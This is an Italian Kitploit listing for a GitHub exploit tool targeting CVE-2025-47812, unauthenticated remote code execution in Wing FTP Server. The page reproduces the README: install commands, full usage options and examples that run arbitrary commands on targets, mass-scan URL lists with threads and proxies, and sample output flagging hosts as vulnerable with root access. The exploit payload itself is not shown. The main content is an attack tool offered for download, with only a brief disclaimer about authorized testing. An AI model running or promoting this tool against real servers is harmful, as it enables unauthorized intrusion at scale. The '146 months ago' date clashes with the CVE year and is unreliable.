Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/0xjuarez/cve-2025-47812
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHub0xjuarez/cve-2025-47812

CVE-2025-47812

Exploit e scanner per CVE-2025-47812 che mira all'esecuzione remota di codice non autenticata in Wing FTP Server, con supporto per target singolo, scansione di massa, proxy e più formati di output.

Vedi Repository
146 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚀 Wing FTP Exploit - CVE-2025-47812

Exploit migliorato per Wing FTP Server CVE-2025-47812 - Esecuzione remota di codice non autenticata (RCE)

🔧 Installazione

Clona questo repository ed entra nella directory:

root@kitploit:~
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt

Oppure scarica semplicemente lo script CVE-2025-47812.py ed eseguilo.

🚀 Utilizzo

root@kitploit:~
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]

Exploit per Wing FTP Server CVE-2025-47812 - versione migliorata

opzioni:
  -h, --help            mostra questo messaggio
  -u URL, --url URL     URL di destinazione (es. http://192.168.1.100:5466)
  -f FILE, --file FILE  file con elenco di URL (uno per riga)
  -c COMMAND, --command COMMAND
                        comando da eseguire (predefinito: echo CVE-2025-47812)
  -U USERNAME, --username USERNAME
                        nome utente (predefinito: anonymous)
  -P PASSWORD, --password PASSWORD
                        password (predefinito: vuota)
  --check               modalità verifica: controlla solo se è vulnerabile (usa comando innocuo)
  -v, --verbose         modalità verbose (mostra dettagli)
  --proxy PROXY         proxy (es. http://127.0.0.1:8080)
  --timeout TIMEOUT     timeout in secondi (predefinito: 10)
  -o OUTPUT, --output OUTPUT
                        file di output per salvare i risultati
  --output-format {txt,json,csv}
                        formato di output (predefinito: txt)
  --threads THREADS     numero di thread per scansionare più obiettivi (predefinito: 5)
  --no-progress         nascondere la barra di avanzamento

🎯 Esempi di base

Testare un singolo obiettivo ed eseguire un comando:

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v

Modalità verifica (rileva solo vulnerabilità):

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check

Scansionare più obiettivi da un file:

root@kitploit:~
python CVE-2025-47812.py -f targets.txt --threads 10 -o risultati.json --output-format json

Usare proxy e verbose:

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v

📁 Struttura del file dei target

Il file deve contenere un URL per riga, ad esempio:

root@kitploit:~
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466

📊 Formati di output

TXT

root@kitploit:~
http://192.168.1.10:5466 - VULNERABILE - utente: root
http://192.168.1.11:5466 - SICURO - Non vulnerabile

JSON

root@kitploit:~
[
  {
    "target": "http://192.168.1.10:5466",
    "vulnerable": true,
    "info": "utente: root"
  }
]

CSV

root@kitploit:~
Target,Vulnerable,Info
http://192.168.1.10:5466,True,utente: root

⚠️ Avvertenza

Questo exploit è progettato esclusivamente per scopi educativi e test di sicurezza autorizzati. L'uso non autorizzato di questo strumento contro sistemi senza consenso esplicito è illegale e può comportare gravi conseguenze legali. Gli autori non si assumono responsabilità per l'uso improprio che ne possa essere fatto.

🤝 Crediti

  • Autore originale: Sheikh Mohammad Hasan (4m3rr0r) – Scoperta ed exploit base.
  • Miglioramenti e refactoring: 0xJuarez – Aggiunte funzionalità di scansione massiva, colori, supporto per proxy, multipli formati di output e miglioramenti di usabilità.

Se ti piace questo lavoro, non dimenticare di dargli una stella ⭐ su GitHub!

📄 Licenza

Questo progetto è concesso in licenza sotto la MIT License – vedere il file LICENSE per maggiori dettagli.

Scarica lo strumento